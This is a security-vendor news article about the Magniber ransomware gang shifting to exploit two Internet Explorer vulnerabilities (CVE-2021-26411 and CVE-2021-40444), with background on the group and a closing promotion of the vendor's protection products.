Contents:
A change of focus took place in the Magniber ransomware’s gang attack method arsenal, as now the threat actor group started to propagate the ransomware and encrypt users’ devices by means of two Internet Explorer vulnerabilities.
Internet Explorer Vulnerabilities Targeted by Magniber Ransomware
As BleepingComputer publication mentions, the Magniber ransomware gang is exploiting two Internet Explorer vulnerabilities.
The first was dubbed CVE-2021-26411, being characterized by a CVSS of 8.8. It was patched during the month of March this year, being a memory corruption bug.
An attacker could host a specially crafted website designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. The attacker could also take advantage of compromised websites or websites that accept or host user-provided content or advertisements, by adding specially crafted content that could exploit the vulnerability.
The second flaw was dubbed CVE-2021-40444, it is basically a remote code execution located in the rendering browser engine of Internet Explorer. This has also a score of 8.8.
Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents. An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document.
The Magniber Ransomware: Some Background
The Mangniber operators usually make use of vulnerabilities they find to perform security breaches with the final goal of ransomware delivery.
They began their operations back in 2017, being considered Cerber ransomware’s successors. In the beginning, as it’s known, they only targeted South Korea’s victims. Then, the gang expanded its action range to other Asian countries like China, Singapore, or Malaysia.
It seems that there is no decryptor available at the moment for this kind of ransomware strain and another particularity of Magniber lies in the fact that its attack methods do not include yet double extortion techniques, limiting for the moment only to file encryption.
Another fact we also wrote about it’s that the Mangniber ransomware focused on the PrintNightmare vulnerabilities during the month of August this year having the intention to breach Windows systems.
Why Did Magniber Ransomware Gang Start to Target IE Vulnerabilities?
As also BleepingComputer mentions, there could be two reasons why this change in focus happened. On one hand, because PrintNightmare vulnerabilities patches and updates were broadly covered by Microsoft and other security researchers in the months that passed, and on the other hand that hackers might have wanted to shift attention to an easier target, as Internet Explorer vulnerabilities could be easily exploited if a user is curious to see what’s in a file or in a certain webpage.
It’s also worth mentioning that the experts from Tencent Security who published a report on this recent Magniber activity, mentioned the malvertising methods the threat actors use in correlation with the IE flaws exploitation, having the role to push exploit kits.
How Can Heimdal™ Help?
In the recent wave of cyberattacks, encryption attempts, and other viruses distributed online, you might want to pay a closer look at the importance of proper cybersecurity solutions in a corporate environment. Heimdal™ Threat Prevention and Heimdal™ Ransomware Encryption Protection can definitely help you with this. Both for local and cloud protection, the first is a predictive endpoint DNS security solution, basically, an excellent filter for traffic at the domain level, as it’s a fact that 91% of the online threats are using the DNS to propagate. Not to mention that it has just received the award “Best Cloud-Delivered Security Solution” at the Network Computing Awards 2021.
The second keeps ransomware apart, making you not be a victim of data encryption or data exfiltration. Both solutions work with any antivirus you already have, so what’s better than flexibility?
We know that you liked this article, so here’s a tip: if you want to keep up to date with everything we post, you might want to follow us on LinkedIn, Twitter, Facebook, Youtube, or Instagram!